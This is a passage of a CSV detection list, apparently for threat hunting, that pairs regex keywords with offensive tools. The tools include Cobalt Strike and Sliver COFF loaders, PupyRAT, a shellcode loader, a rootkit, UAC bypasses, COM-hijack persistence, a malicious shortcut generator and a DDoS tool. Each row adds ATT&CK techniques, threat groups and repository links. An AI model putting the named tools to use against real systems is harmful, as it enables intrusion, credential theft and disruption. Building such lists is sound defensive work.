T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","N/A","10","10","215","44","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z","38607" "*COFF_Loader.*",".{0,1000}COFF_Loader\..{0,1000}","offensive_tool_keyword","cobaltstrike","Load and execute COFF files and Cobalt Strike BOFs in-memory","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - 
T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Yaxser/COFFLoader2","1","1","N/A","N/A","10","10","215","44","2022-09-13T14:58:30Z","2021-12-14T07:49:17Z","38608" "*COFF_PREP_BEACON*",".{0,1000}COFF_PREP_BEACON.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - 
DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38609" "*CoffeeLdr* go *",".{0,1000}CoffeeLdr.{0,1000}\sgo\s.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard 
Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","0","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38610" "*CoffeeLdr.x64.exe*",".{0,1000}CoffeeLdr\.x64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38611" 
"*CoffeeLdr.x86.exe*",".{0,1000}CoffeeLdr\.x86\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38612" "*COFFELDR_COFFELDR_H*",".{0,1000}COFFELDR_COFFELDR_H.{0,1000}","offensive_tool_keyword","cobaltstrike","Beacon Object File Loader","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - 
T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/Cracked5pider/CoffeeLdr","1","1","N/A","N/A","10","10","286","38","2023-12-03T18:09:34Z","2022-07-18T15:21:11Z","38613" "*coffexec *.o *",".{0,1000}coffexec\s.{0,1000}\.o\s.{0,1000}","offensive_tool_keyword","bruteratel","A Customized Command and Control Center for Red Team and Adversary Simulation","T1087-002 - T1071-001 - T1059-003 - T1005 - T1140 - T1482 - T1574-001 - T1562-006 - T1105 - T1036-005 - T1106 - T1046 - T1095 - T1027-002 - T1069-002 - T1057 - T1572 - T1620 - T1021-002 - T1113 - T1518-001 - T1558-003 - T1569-002 - T1204-002 - T1497-003 - T1102 - T1047","TA0002 - TA0003 - TA0011 -TA0010","N/A","BlackSuit - Royal - BlackCat - COZY BEAR - Black Basta","C2","https://bruteratel.com/","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","38614" 
"*COFFLdr.cpp*",".{0,1000}COFFLdr\.cpp.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","38615" "*COFFLdr.exe*",".{0,1000}COFFLdr\.exe.{0,1000}","offensive_tool_keyword","Jormungandr","Jormungandr is a kernel implementation of a COFF loader allowing kernel developers to load and execute their COFFs in the kernel","T1215 - T1059.003 - T1547.006","TA0004 - TA0005 - TA0002","N/A","N/A","Exploitation tool","https://github.com/Idov31/Jormungandr","1","1","N/A","N/A","N/A","3","228","27","2023-09-26T18:06:53Z","2023-06-25T06:24:16Z","38616" "*COFFLoader.*",".{0,1000}COFFLoader\..{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","38617" "*COFFLoader.x64.dll*",".{0,1000}COFFLoader\.x64\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - 
TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38618" "*COFFLoader.x86.dll*",".{0,1000}COFFLoader\.x86\.dll.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","1","N/A","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","38619" "*COFFLoader64.exe*",".{0,1000}COFFLoader64\.exe.{0,1000}","offensive_tool_keyword","cobaltstrike","This is a quick and dirty COFF loader (AKA Beacon Object Files). 
Currently can run un-modified BOF's so it can be used for testing without a CS agent running it","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","APT19 - MAZE - APT32 - APT37 - APT41 - Aquatic Panda - AvosLocker - Black Basta - BlackByte - BlackCat - BlackSuit - CL0P - Cactus - Chimera - Cobalt Group - Conti - Common Raven - CopyKittens - Cuba - Dagon Locker - DarkHydrus - Diavol - Earth Lusca - EvilCorp* - FIN6 - FIN7 - Hive - Indrik Spider - Karakurt - Leviathan - LockBit - LuminousMoth - Mustang Panda - NetWalker - Nokoyawa - PLAY - Phobos - Qilin - Quantum - REvil - RagnarLocker - RansomEXX - Royal - Ryuk - Snatch - TA505 - Threat Group-3390 - Trigona - Vice Society - Wizard Spider - XingLocker - Yanluowang - menuPass - Unit 29155 - Akira - APT15 - APT26 - BRONZE STARLIGHT - COZY BEAR - Sandworm","C2","https://github.com/trustedsec/COFFLoader","1","1","N/A","N/A","10","10","520","78","2025-04-03T14:57:10Z","2021-02-19T19:14:43Z","38620" "*CognisysGroup/HadesLdr*",".{0,1000}CognisysGroup\/HadesLdr.{0,1000}","offensive_tool_keyword","HadesLdr","Shellcode Loader Implementing Indirect Dynamic Syscall - API Hashing - Fileless Shellcode retrieving using Winsock2","T1055.012 - T1055.001 - T1547.002","TA0005 - TA0040","N/A","N/A","Exploitation 
tool","https://github.com/CognisysGroup/HadesLdr","1","1","N/A","N/A","10","3","292","47","2023-07-15T21:23:49Z","2023-07-12T11:44:07Z","38621" "*coinomi2john.py*",".{0,1000}coinomi2john\.py.{0,1000}","offensive_tool_keyword","JohnTheRipper","John the Ripper jumbo - advanced offline password cracker","T1110 - T1003.001","TA0006","N/A","Black Basta","Credential Access","https://github.com/openwall/john/","1","1","N/A","N/A","N/A","10","11216","2220","2025-04-22T11:24:06Z","2011-12-16T19:43:47Z","38622" "*coldfusion_dir_traversal_exploit*",".{0,1000}coldfusion_dir_traversal_exploit.{0,1000}","offensive_tool_keyword","beef","BeEF is short for The Browser Exploitation Framework. It is a penetration testing tool that focuses on the web browser.","T1201 - T1505.003","TA0001 - TA0002","N/A","Rocket Kitten","Framework","https://github.com/beefproject/beef","1","1","N/A","N/A","8","10","10174","2256","2025-04-22T14:01:20Z","2011-11-23T06:53:25Z","38623" "*Coldroot Sock5 Server*",".{0,1000}Coldroot\sSock5\sServer.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","0","#productname","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","38624" "*Coldzer0/ReverseSock5Proxy*",".{0,1000}Coldzer0\/ReverseSock5Proxy.{0,1000}","offensive_tool_keyword","ReverseSock5Proxy","A tiny Reverse Sock5 Proxy","T1090.002 - T1572 - T1071","TA0011 - TA0010","N/A","N/A","C2","https://github.com/Coldzer0/ReverseSock5Proxy","1","1","N/A","N/A","10","10","317","42","2022-11-28T21:18:26Z","2022-11-25T15:12:59Z","38625" "*ColeHouston/Sunder*",".{0,1000}ColeHouston\/Sunder.{0,1000}","offensive_tool_keyword","Sunder","Windows rootkit designed to work with BYOVD exploits","T1543.003 - T1562.001 - T1547.001 - T1068 - T1548.002","TA0003 - TA0004 - 
TA0005","N/A","N/A","Persistence","https://github.com/ColeHouston/Sunder","1","1","N/A","N/A","10","2","183","20","2025-01-18T10:41:50Z","2025-01-10T03:57:05Z","38626" "*Collect security tokens from pipe server (\\\\.\\pipe\\catcher)*",".{0,1000}Collect\ssecurity\stokens\sfrom\spipe\sserver\s\(\\\\\\\\\.\\\\pipe\\\\catcher\).{0,1000}","offensive_tool_keyword","pupy","PupyRAT is a C2 and post-exploitation framework written in python and C","T1548.002 - T1134.001 - T1087.001 - T1557.001 - T1071.001 - T1560.001 - T1123 - T1547.001 - T1547.013 - T1059.001 - T1059.006 - T1136.001 - T1136.002 - T1543.002 - T1555 - T1555.003 - T1114.001 - T1573.002 - T1041 - T1083 - T1070.001 - T1105 - T1056.001 - T1046 - T1135 - T1003.001 - T1003.004 - T1003.005 - T1057 - T1055.001 - T1021.001 - T1113 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1552.001 - T1550.003 - T1125 - T1497.001","TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011","N/A","Black Basta - Magic Hound - APT33 - Cutting Kitten","C2","https://github.com/n1nj4sec/pupy","1","0","N/A","N/A","10","10","8671","1822","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z","38627" "*Collecting Privesc methods*",".{0,1000}Collecting\sPrivesc\smethods.{0,1000}","offensive_tool_keyword","ADAPE-Script","Active Directory Assessment and Privilege Escalation Script","T1178 - T1087 - T1482","TA0002 - TA0004 - TA0007","N/A","Black Basta","Privilege Escalation","https://github.com/cjoan75/ADAPE-Script","1","0","N/A","N/A","8","1","0","0","2020-07-11T00:53:24Z","2020-08-09T16:52:35Z","38628" "*Collection/MiniDumpWriteDump.*",".{0,1000}Collection\/MiniDumpWriteDump\..{0,1000}","offensive_tool_keyword","WheresMyImplant","A Bring Your Own Land Toolkit that Doubles as a WMI Provider","T1055 - T1027 - T1045 - T1105 - T1132 - T1021 - T1124 - T1005 - T1071","TA0002 - TA0004 - TA0005 - TA0007 - TA0008 - TA0010 - 
TA0011","N/A","N/A","C2","https://github.com/0xbadjuju/WheresMyImplant","1","1","N/A","N/A","10","10","285","58","2018-10-31T16:56:51Z","2017-09-22T19:40:40Z","38629" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","38630" "*Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z.py*",".{0,1000}Collection_ArchiveCollectedData_ArchiveViaCustomMethod_7z\.py.{0,1000}","offensive_tool_keyword","viperc2","viperpython backend - Viper is a graphical intranet penetration tool which modularizes and weaponizes the tactics and technologies commonly used in the process of Intranet penetration","T1566-001 - T1566-002 - T1566-003 - T1003 - T1055 - T1036 - T1105 - T1057 - T1574-001 - T1569-002 - T1070 - T1135 - T1005 - T1065 - T1069 - T1027 - T1021 - T1086 - T1087 - T1096 - T1560","TA0002 - TA0003","N/A","Black Basta","C2","https://github.com/FunnyWolf/viperpython","1","1","N/A","N/A","10","","N/A","","","","38631" "*--collectionmethod DCOnly*",".{0,1000}\-\-collectionmethod\sDCOnly.{0,1000}","offensive_tool_keyword","RustHound","Active Directory data collector for BloodHound written in Rust","T1087.002 - T1018 - T1059.003","TA0007 - TA0001 - TA0002","N/A","N/A","Discovery","https://github.com/OPENCYBER-FR/RustHound","1","0","N/A","AD Enumeration","9","10","1013","98","2024-10-21T18:58:20Z","2022-10-12T05:54:35Z","38632" 
"*ColorDataProxyUACBypass*",".{0,1000}ColorDataProxyUACBypass.{0,1000}","offensive_tool_keyword","cobaltstrike","Collection of UAC Bypass Techniques Weaponized as BOFs","T1548.002 - T1203 - T1055 - T1134.002","TA0005 - TA0004","N/A","N/A","Privilege Escalation","https://github.com/icyguider/UAC-BOF-Bonanza","1","1","N/A","N/A","10","6","500","65","2024-02-21T22:07:54Z","2024-02-16T14:47:13Z","38633" "*COM Object hijacking persistence.ps1*",".{0,1000}COM\sObject\shijacking\spersistence\.ps1.{0,1000}","offensive_tool_keyword","COM-Object-hijacking","use COM Object hijacking to maintain persistence.(Hijack CAccPropServicesClass and MMDeviceEnumerator)","T1546.015","TA0003","N/A","N/A","Persistence","https://github.com/3gstudent/COM-Object-hijacking","1","0","N/A","N/A","8","1","58","30","2017-08-04T09:19:40Z","2017-08-04T08:15:36Z","38634" "*com.itgorillaz.lnk2pwn.model*",".{0,1000}com\.itgorillaz\.lnk2pwn\.model.{0,1000}","offensive_tool_keyword","lnk2pwn","Malicious Shortcut(.lnk) Generator","T1204 - T1059.007","TA0001 - TA0002","N/A","N/A","Phishing","https://github.com/it-gorillaz/lnk2pwn","1","0","N/A","N/A","8","2","193","34","2018-11-23T17:18:49Z","2018-11-23T00:12:48Z","38636" "*com.rastamouse.*",".{0,1000}com\.rastamouse\..{0,1000}","offensive_tool_keyword","SharpC2","Command and Control Framework written in C#","T1071 - T1024 - T1105 - T1090 - T1091 - T1021 - T1573","TA0001 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/rasta-mouse/SharpC2","1","1","N/A","N/A","10","10","399","57","2023-07-27T12:25:54Z","2022-10-26T12:18:07Z","38638" "*com/Anonym0usWork1221/Free-Proxies/main/proxy_files/http_proxies.txt*",".{0,1000}com\/Anonym0usWork1221\/Free\-Proxies\/main\/proxy_files\/http_proxies\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - 
T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38639" "*com/Anonym0usWork1221/Free-Proxies/main/proxy_files/https_proxies.txt*",".{0,1000}com\/Anonym0usWork1221\/Free\-Proxies\/main\/proxy_files\/https_proxies\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38640" "*com/mmpx12/proxy-list/master/https.txt*",".{0,1000}com\/mmpx12\/proxy\-list\/master\/https\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38641" "*com/monosans/proxy-list/main/proxies/http.txt*",".{0,1000}com\/monosans\/proxy\-list\/main\/proxies\/http\.txt.{0,1000}","offensive_tool_keyword","MegaMedusa","MegaMedusa is DDoS tool using NodeJS language","T1498 - T1498.001","TA0040","N/A","N/A","DDOS","https://github.com/TrashDono/MegaMedusa","1","1","N/A","N/A","7","3","221","76","2025-03-20T17:26:23Z","2024-04-09T11:57:14Z","38642" 